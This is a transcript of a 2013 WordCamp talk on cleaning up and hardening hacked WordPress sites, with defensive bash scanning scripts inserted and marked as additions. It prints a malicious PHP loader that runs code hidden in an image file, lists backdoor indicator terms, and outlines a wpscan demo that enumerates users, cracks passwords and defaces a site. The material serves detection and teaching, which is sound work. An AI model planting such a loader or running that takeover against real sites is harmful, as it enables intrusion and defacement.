WordPress Security - WordCamp Phoenix 2013

WordPress Security: Dealing with Today’s Hacks

WordPress security at WordCamp Phoenix 2013.

Transcript of WordPress Security - WordCamp Phoenix 2013

Page 1

WordPress Security

Dealing with Today’s Hacks

Page 2

04/10/2023

If you don’t ask, you don’t get!

• Dre Armeda, CISSP
• CEO, Co-Founder at Sucuri Inc.
• @dremeda
• Dre.im

I'm a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I'm infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!

Dre Armeda - @dremeda #wcphx

Page 3

Why listen to me? You don’t have to, but…

• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy
– Managed security awareness for Sempra Energy
– Deployed security suite for 1-800-Flowers
– Cleaned Martha Stewart web properties of malware
• Not an expert, passionate enthusiast.
• Seriously though – quick Sucuri stats:
– Remediate 200 – 300 infected websites a day, 24/7/365
– Perform 2 million + malware website scans a month
– Support all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc.)

My goal in life is to make the web a safer place!

04/10/2023 Dre Armeda - @dremeda #wcphx

Page 4

Thoughts To Kick Things Off

• Information Security is about risk reduction.
– If you’re looking for the “silver bullet” this is the wrong talk for you.
• To think that you will never be infected is like saying you will never be sick.
– Someone tells you different – percussion calibration time
• Prevention is ideal, but not realistic.
– Risk will never be 0%
– Detection is key.

Page 5

Know Your Enemy

• They have time & resources
• They are intelligent
• Attacks are automated
• Goal is to impact quantity
• Own one, own them all…
• It’s not personal

Page 6

Ok, so what’s the problem?

TODAY’S ISSUES:
• The Ecosystem / Environment
• Access Control
• Software Vulnerabilities
• Administration
• Credential Management
• Extensibility

Page 7

Today’s Focus

• Ecosystem / Environment
• Access Control
• Dealing with Hacks

Page 8

Logical Architecture

[Diagram; labels only, the layout was not recoverable: Linux Operating System; Apache (+ modules); PHP (+ modules); PHP-CGI; MySQL; WordPress; cPanel; Plesk; phpMyAdmin]

Page 9

The EcoSystem / Environment

• Apache
– Malicious module injects iFrames
– http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
• phpMyAdmin
– Mirror hacked
– http://sourceforge.net/blog/phpmyadmin-back-door/
• PHP-CGI
– Remote Code Execution
– http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
• Plesk
– Vulnerable to SQLi attacks
– http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

Page 10

The EcoSystem / Environment

• What can you do?
– Not much… it is completely outside of your control if you’re using a shared or managed host
• But you can reduce risk...
– Use a Dedicated / VPS environment
• But recognize the responsibility that this entails; if what I mentioned previously doesn’t make sense, skip to the next step
– Go with a Managed Host
• Doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on

Page 11

Access is Key

• We have to change the way we treat and think about access. All access – server / application.
• We are going through the same mistakes servers and desktops were making in the 90’s with access.
• Know where you are surfing the web: do you really need to log in as an admin at the coffee shop?

Page 12

Before We Dive In

Page 13

WordPress Loving Infections

• Defacements
• Backdoors
• Pharma Hack
• Injections – iFrame specifically
• Malicious Redirects
• Phishing

Page 14

DEFACEMENTS
Hacktivism at its finest… you now support a cause!?!?!

Page 15

Defacements

• Hacktivism 101
– Annoying as S*&T
• Places to look:
– index.html
– index.php
• Root directory
• wp-content
• Theme directory
• GREP is your friend:
– grep -ri 'sniper399' .

Page 16

BACKDOORS
It’s ok to cry a little…

Page 17

Backdoors

• Common terms:
– is_bot
– eval
– base64_decode
– fopen
– fclose
– readfile
– edoced_46esab (base64_decode spelled backwards, a common obfuscation)
– exec
– system
– shell_exec
– gzuncompress
– popen
– FilesMan
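Putting the two grep slides to work, as an added example that is not part of the deck: a small bash script that greps a WordPress tree for the backdoor terms listed above (matching whole words so that "evaluate" does not trigger on "eval") and for a defacer's tag as on the Defacements slide. The sample tree, the file names and the base64 payload are constructed for the example; a hit only means "read this file", not proof of compromise.

```shell
#!/usr/bin/env bash
# Added example (not from the deck): grep a WordPress tree for the backdoor
# indicator terms listed on the slide, and for a defacer's tag as on the
# Defacements slide. It runs here against a constructed sample tree, never
# against a live site; treat every hit as "read this file", not as proof.

# Terms from the slide, joined as extended-regex alternatives. Matching whole
# words (-w) keeps "evaluate" or "systematic" from triggering "eval"/"system".
BACKDOOR_TERMS='is_bot|eval|base64_decode|fopen|fclose|readfile|edoced_46esab|exec|system|shell_exec|gzuncompress|popen|FilesMan'

# scan_backdoor_terms DIR -> "path:line:text" for each hit in .php files
scan_backdoor_terms() {
  grep -rniwE --include='*.php' "($BACKDOOR_TERMS)" "$1" 2>/dev/null | sort
}

# count_backdoor_files DIR -> number of distinct .php files with a hit
count_backdoor_files() {
  scan_backdoor_terms "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# scan_defacement_tag DIR TAG -> files containing TAG, any extension
# (the slide's grep -ri 'sniper399' . over the paths it lists)
scan_defacement_tag() {
  grep -rli -- "$2" "$1" 2>/dev/null | sort
}

# make_sample_tree -> path of a constructed tree with one clean template,
# one backdoor-shaped file (harmless payload) and one defaced page
make_sample_tree() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/wp-content/themes/demo" "$root/wp-content/uploads"
  # Clean theme template: nothing here should match.
  printf '%s\n' '<?php get_header(); ?>' '<h1><?php the_title(); ?></h1>' \
    > "$root/wp-content/themes/demo/index.php"
  # eval(base64_decode(...)) is the shape to recognise; the constructed
  # payload decodes to: echo "hi";
  printf '%s\n' '<?php @eval(base64_decode("ZWNobyAiaGkiOw=="));' \
    > "$root/wp-content/uploads/cache.php"
  # Constructed defaced page carrying a tag string.
  printf '%s\n' '<html><body>Hacked by sniper399</body></html>' \
    > "$root/wp-content/uploads/index.html"
  echo "$root"
}

# Usage on a real install would be: scan_backdoor_terms /var/www/html
if [ "${1:-}" = "--demo" ]; then
  root=$(make_sample_tree)
  scan_backdoor_terms "$root"
  scan_defacement_tag "$root" sniper399
  rm -rf "$root"
fi
```

Expect noise from legitimate plugins that genuinely call fopen or exec; the value of the scan is in the files you did not expect to see in the list, above all anything executable under wp-content/uploads.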

Page 18

PHARMA HACK
Erectile Dysfunction pills are leading ads.. Who knew..

Page 19

Pharma Hack

• Multi-million $ business
• Rarely distributes malware
• Impression-based affiliate marketing
• Google’s Search Engine Result Pages (SERP)
• Odds of malware distribution are actually low
• Tricks:
– Embedded within core files
– Look for “.tmp” directories =>

Page 20

Pharma Hack, cntd..

• Try using curl to emulate Google and Windows:
curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com
– Google Webmaster Tools
• Fetch as Googlebot
• Check your theme index.php file for things like this (a malicious loader that executes PHP hidden inside an image file):
– <?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
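The cloaking check behind the slide's curl command, as an added example that is not from the deck: fetch the page once as an ordinary browser and once with the Googlebot User-Agent, then list pharma keywords that appear only in the bot copy. The keyword list, the browser User-Agent string and the sample responses are constructed for the example; the comparison runs on saved bodies so it can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example, not from the deck: fetch a page as a normal browser and as
# Googlebot (the slide's curl -L -A), then report pharma keywords present only
# in the bot copy. Pharma hacks cloak their spam to search engines, so a
# difference between the two copies is the tell. The comparison works on
# saved bodies, so it runs offline on constructed responses.

GOOGLEBOT_UA='Googlebot/2.1 (+http://www.google.com/bot.html)'
BROWSER_UA='Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36'   # constructed

# Constructed keyword list; extend it with whatever the SERP snippets show.
PHARMA_PATTERN='viagra|cialis|levitra|pharmacy|pills'

# fetch_as UA URL OUTFILE : the slide's curl -L -A, saving the body to a file
fetch_as() {
  curl -sS -L -A "$1" -o "$3" "$2"
}

# pharma_hits FILE -> distinct matching keywords, lowercased, one per line
pharma_hits() {
  grep -oiE "$PHARMA_PATTERN" "$1" | tr 'A-Z' 'a-z' | sort -u
}

# cloaked_pharma BROWSER_FILE BOT_FILE -> keywords present only in the bot copy
cloaked_pharma() {
  local a b
  a=$(mktemp); b=$(mktemp)
  pharma_hits "$1" > "$a"
  pharma_hits "$2" > "$b"
  comm -13 "$a" "$b"      # lines unique to the second (bot) file
  rm -f "$a" "$b"
}

# check_site URL -> runs both fetches and prints the cloaked keywords
# (needs network access; not exercised by the offline sample below)
check_site() {
  local dir
  dir=$(mktemp -d)
  fetch_as "$BROWSER_UA" "$1" "$dir/browser.html"
  fetch_as "$GOOGLEBOT_UA" "$1" "$dir/bot.html"
  cloaked_pharma "$dir/browser.html" "$dir/bot.html"
  rm -rf "$dir"
}

# make_sample_responses -> dir with a clean browser copy and a cloaked bot copy
make_sample_responses() {
  local dir
  dir=$(mktemp -d)
  printf '%s\n' '<html><body><h1>My Blog</h1><p>Welcome!</p></body></html>' \
    > "$dir/browser.html"
  # Same page, plus a hidden block only served to the crawler (constructed).
  printf '%s\n' '<html><body><h1>My Blog</h1><p>Welcome!</p>' \
    '<div style="display:none"><a href="http://spam.example.invalid/">cheap Viagra online pharmacy</a></div>' \
    '</body></html>' > "$dir/bot.html"
  echo "$dir"
}
```

An empty result does not clear the site: some campaigns key on the referrer (a click from a Google result) rather than the User-Agent, which is why the slide also points at Webmaster Tools' "Fetch as Googlebot".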

Page 21

Pharma Hack, cntd..

Page 22

INJECTIONS
It only hurts for a minute…

Page 23

Injections

• Invisible iFrames – executing in your browser
• Contributing to drive-by downloads, pharma, XSS, CSRF
• Places to check – pages that generate content:
– JS files, header.php, index.php, functions.php, footer.php

Page 24

Injections, cntd…

• PHP iFrame injection =>
– count##.php
– Check all index.php / theme JS files
– Example below:

Page 25

Injections, cntd…

• Pharma link injections =>
• Drive-by downloads

Page 26

MALICIOUS REDIRECTS
WTF?!?! Why don’t I understand what it says?

Page 27

Malicious Redirects

• Redirects your user to a domain distributing malware; fundamentally different from an iframe injection that executes in your browser
• 8 out of 10 times, check your .htaccess file – all of them:
– # find /var/www -name .htaccess -type f | wc -l
• Check for backdoors also – often a sign of a bigger issue
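The find one-liner above only counts the files; the following added example (not part of the deck) goes one step further and flags the .htaccess files whose rules key on the visitor's referrer or User-Agent or send visitors to an absolute external URL, which is the usual shape of a conditional redirect. The directory tree, the rules and the hostname are constructed for the example.

```shell
#!/usr/bin/env bash
# Added example, not part of the deck: enumerate every .htaccess under a web
# root (the slide's find | wc -l, wrapped as a function) and flag the ones
# whose rewrite logic keys on the visitor's referrer or user agent, or whose
# target is an absolute external URL. Runs on a constructed tree; paths and
# rules are made up for the example.

# count_htaccess ROOT -> number of .htaccess files (the slide's one-liner)
count_htaccess() {
  find "$1" -name .htaccess -type f | wc -l | tr -d ' '
}

# Heuristics worth a human look (legitimate rules can match too):
#  - RewriteCond on HTTP_REFERER or HTTP_USER_AGENT (search-engine/mobile keyed)
#  - RewriteRule or Redirect whose target is an absolute http(s) URL
#  - ErrorDocument pointing at an external URL
SUSPICIOUS_RE='RewriteCond[[:space:]]+%\{HTTP_(REFERER|USER_AGENT)\}|(RewriteRule|Redirect).*https?://|ErrorDocument[[:space:]]+[0-9]+[[:space:]]+https?://'

# flag_htaccess ROOT -> paths of .htaccess files matching SUSPICIOUS_RE
flag_htaccess() {
  find "$1" -name .htaccess -type f -exec grep -liE "$SUSPICIOUS_RE" {} + 2>/dev/null | sort
}

# show_flagged_rules FILE -> the offending lines with line numbers, for triage
show_flagged_rules() {
  grep -niE "$SUSPICIOUS_RE" "$1"
}

# make_htaccess_tree -> constructed root with a stock WordPress .htaccess,
# a harmless one in wp-includes, and a referrer-keyed redirect in uploads
make_htaccess_tree() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/wp-includes" "$root/wp-content/uploads"
  cat > "$root/.htaccess" <<'EOF'
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
EOF
  printf '%s\n' 'Options -Indexes' > "$root/wp-includes/.htaccess"
  cat > "$root/wp-content/uploads/.htaccess" <<'EOF'
# constructed sample of a conditional redirect, NOT a real rule set
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://redirect.example.invalid/ [R=302,L]
EOF
  echo "$root"
}

# Usage on a real server: count_htaccess /var/www; flag_htaccess /var/www
if [ "${1:-}" = "--demo" ]; then
  root=$(make_htaccess_tree)
  count_htaccess "$root"
  for f in $(flag_htaccess "$root"); do echo "== $f"; show_flagged_rules "$f"; done
  rm -rf "$root"
fi
```

Referrer-keyed rules explain the slide's "why don't I understand what it says": the site owner, who types the URL directly, never triggers the redirect, while visitors arriving from a search result do.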

Page 28

PHISHING
Biggest growing problem, exceptionally difficult to detect…

Page 29

Phishing

• Growing at a faster pace than traditional web malware
• No impact to readers, but tied to SPAM bots sending out emails like this:

Page 30

Phishing, cntd…

Page 31

DEMONSTRATION
Bringing the Point Home

Page 32

Demo Objective

• Use good tools for bad things – wpscan
• Enumerate the users
• Enumerate passwords
• Own target WordPress site
• Deface the website

I have 5 minutes – Ready?

Page 33

KEEPING IT REAL
Remember the risk discussion?

Page 34

Update

• Oldest version found in production – 1.5
• Leading cause of cross-site contamination issues
• Perhaps the simplest of tasks, yet we still find this:

Page 35

Access is Key

• On the server:
– Kill accounts that are not in use
– FTP is the devil – slap yourself and switch to SFTP
– Disable password auth & use key pairs
• WordPress admin:
– Multi-factor authentication on wp-admin
– Two-factor authentication on wp-login.php
• Employ least privilege:
– Only use admin accounts for admin tasks
– Learn to use Editor, Author, Contributor, Subscriber
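A way to check the server-side half of this slide ("disable password auth & use key pairs"), as an added example that is not from the deck: a bash audit of sshd_config that reads the first active value of each keyword, because sshd uses the first occurrence it finds, not the last. The sample configs are constructed; Match blocks are not evaluated, and the keyword ChallengeResponseAuthentication is checked because keyboard-interactive login can still prompt for a password through PAM even when PasswordAuthentication is off.

```shell
#!/usr/bin/env bash
# Added example, not from the deck: audit an sshd_config for the access
# settings the slide calls for (no password auth, keys only) plus root login.
# sshd honours the FIRST occurrence of a keyword, so the check reads the first
# active line for each. Match blocks are not handled. Runs on constructed files.

# effective_setting FILE KEY -> first active (uncommented) value, or "" if unset
effective_setting() {
  awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1"
}

# audit_sshd FILE -> one "FAIL Key=value" line per weak setting, or "ok";
# exit status is 1 when anything failed
audit_sshd() {
  local cfg="$1" fails=0 v
  # Default is "yes", so an unset keyword counts as a failure.
  v=$(effective_setting "$cfg" PasswordAuthentication)
  [ "$v" = "no" ] || { echo "FAIL PasswordAuthentication=${v:-unset}"; fails=1; }
  # Keyboard-interactive can still collect a password via PAM; default "yes".
  v=$(effective_setting "$cfg" ChallengeResponseAuthentication)
  [ "$v" = "no" ] || { echo "FAIL ChallengeResponseAuthentication=${v:-unset}"; fails=1; }
  # Root should log in with a key at most, never with a password.
  v=$(effective_setting "$cfg" PermitRootLogin)
  case "$v" in
    no|prohibit-password|without-password) ;;
    *) echo "FAIL PermitRootLogin=${v:-unset}"; fails=1 ;;
  esac
  # Default is "yes", so only an explicit "no" is a failure here.
  v=$(effective_setting "$cfg" PubkeyAuthentication)
  [ "$v" != "no" ] || { echo "FAIL PubkeyAuthentication=no"; fails=1; }
  [ "$fails" -eq 0 ] && echo ok
  return "$fails"
}

# make_sample_configs -> dir holding a constructed weak and a hardened config
make_sample_configs() {
  local dir
  dir=$(mktemp -d)
  cat > "$dir/weak.conf" <<'EOF'
# constructed: password logins and root logins allowed
Port 22
#PasswordAuthentication no
PasswordAuthentication yes
PermitRootLogin yes
EOF
  cat > "$dir/hardened.conf" <<'EOF'
# constructed: keys only, root may use a key but never a password
Port 22
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin prohibit-password
PubkeyAuthentication yes
EOF
  echo "$dir"
}

# Usage on a server: audit_sshd /etc/ssh/sshd_config
if [ "${1:-}" = "--demo" ]; then
  dir=$(make_sample_configs)
  audit_sshd "$dir/weak.conf" || true
  audit_sshd "$dir/hardened.conf"
  rm -rf "$dir"
fi
```

Before turning password authentication off, confirm from a second session that your key-based login works; a locked-out admin on a VPS is the other half of the "responsibility that this entails" from the hosting slide.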

Page 36

Password Dilemma

• 15 character pass
– 3 months to crack
• Long / complex / unique
– Key to passwords
• Prefer password manager
– You don’t? ok..
– Passphrases work too
• iLuvWCLpHX:2013:S@nT@N b@By
• Come up with a process & stick to it:
– One scheme:
• Remember 8 characters
• Write down 8 characters
• Save 20 characters
– Second scheme:
• Remember 20 characters
• Prefix characters with site name
• End sequence with some date

Page 37

Kill PHP Execution

• Kill PHP execution – directories:
• wp-includes
• wp-content
• uploads – at a minimum

<Files *.php>
Deny from all
</Files>

Page 38

Disable Theme / Plugin Editor

I’d take it a step further and remove the ability to install, but that’s just me.

Modify wp-config.php with:

• Disable the plugin / theme editor
– define('DISALLOW_FILE_EDIT', true);

- OR -

• Disable plugin / theme update and installation
– define('DISALLOW_FILE_MODS', true);
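The two hardening steps from the "Kill PHP Execution" and "Disable Theme / Plugin Editor" slides, applied and verified by a bash script; this is an added example, not the deck's or Sucuri's code. It assumes the standard WordPress layout and the stock "stop editing" marker in wp-config.php, and the install it runs on is constructed in a temp directory. Because "Deny from all" is Apache 2.2 syntax that Apache 2.4 only honours with mod_access_compat, the .htaccess it writes carries both the old form and 2.4's "Require all denied".

```shell
#!/usr/bin/env bash
# Added example, not from the deck: apply the two hardening steps from the
# slides to a WordPress install and verify them. It drops an .htaccess that
# refuses direct requests for *.php into the directories the slide names, and
# adds the chosen DISALLOW_* constant to wp-config.php exactly once.
# Exercised on a constructed install; the WordPress tree layout is assumed.

# write_php_deny DIR : Apache 2.2 uses "Deny from all"; 2.4 wants
# "Require all denied" (the old form needs mod_access_compat), so both are
# emitted behind IfModule and the file works on either version.
write_php_deny() {
  cat > "$1/.htaccess" <<'EOF'
# Refuse direct HTTP requests for PHP files dropped into this directory.
<Files "*.php">
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
  </IfModule>
</Files>
EOF
}

# add_wp_constant WPCONFIG NAME : insert define('NAME', true); before the
# "stop editing" marker (a define after wp-settings.php loads is too late);
# calling it twice is a no-op
add_wp_constant() {
  local cfg="$1" name="$2" tmp
  grep -q "define( *'$name'" "$cfg" && return 0
  tmp=$(mktemp)
  awk -v def="define('$name', true);" '
    /stop editing/ && !done { print def; done = 1 }
    { print }
    END { if (!done) print def }
  ' "$cfg" > "$tmp" && cat "$tmp" > "$cfg"   # cat keeps the file's owner/mode
  rm -f "$tmp"
}

# harden_install ROOT NAME : NAME is DISALLOW_FILE_EDIT or DISALLOW_FILE_MODS
harden_install() {
  local d
  for d in wp-includes wp-content wp-content/uploads; do
    if [ -d "$1/$d" ]; then write_php_deny "$1/$d"; fi
  done
  add_wp_constant "$1/wp-config.php" "$2"
}

# verify_hardening ROOT NAME -> "ok", or "missing: ..." with non-zero status
verify_hardening() {
  local d
  for d in wp-includes wp-content wp-content/uploads; do
    grep -q 'Require all denied' "$1/$d/.htaccess" 2>/dev/null \
      || { echo "missing: $d/.htaccess"; return 1; }
  done
  grep -q "define('$2', true);" "$1/wp-config.php" \
    || { echo "missing: $2"; return 1; }
  echo ok
}

# count_constant ROOT NAME -> how many times the define appears (expect 1)
count_constant() {
  grep -c "define('$2', true);" "$1/wp-config.php"
}

# make_sample_install -> constructed minimal WordPress tree with a wp-config
make_sample_install() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/wp-includes" "$root/wp-content/uploads"
  cat > "$root/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
/* That's all, stop editing! Happy blogging. */
require_once(ABSPATH . 'wp-settings.php');
EOF
  echo "$root"
}

# Usage on a real install: harden_install /var/www/html DISALLOW_FILE_MODS
if [ "${1:-}" = "--demo" ]; then
  root=$(make_sample_install)
  harden_install "$root" DISALLOW_FILE_MODS
  verify_hardening "$root" DISALLOW_FILE_MODS
  rm -rf "$root"
fi
```

The uploads directory is the safe place for a blanket deny; wp-content and wp-includes have served some PHP files directly (a few plugins do, and multisite's ms-files.php lives in wp-includes), so test the site after applying it there and add exceptions rather than removing the rule.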

Page 39

Plugins That Help

Sucuri clients:
• Sucuri Security Plugin
• Theme-Check
• BackupBuddy
• Akismet

Non-clients:
• Limit Login Attempts
• Theme-Check
• BackupBuddy
• Akismet

Page 40

Need a Hand?

Support Forums
• Sucuri Blog: http://blog.sucuri.net
• SiteCheck Scanner: http://sitecheck.sucuri.net
• Unmask Parasites: http://unmaskparasites.com
• Perishable Press: http://perishablepress.com/category/web-design/security/
• Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Online Resources
• Hacked – http://wordpress.org/tags/hacked
• Malware – http://wordpress.org/tags/malware
• BadwareBusters – https://badwarebusters.org

Page 41

Dre Armeda, CISSP
Dre.im
@dremeda

Sucuri Inc.
http://sucuri.net
http://blog.sucuri.net
@sucuri_security

Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.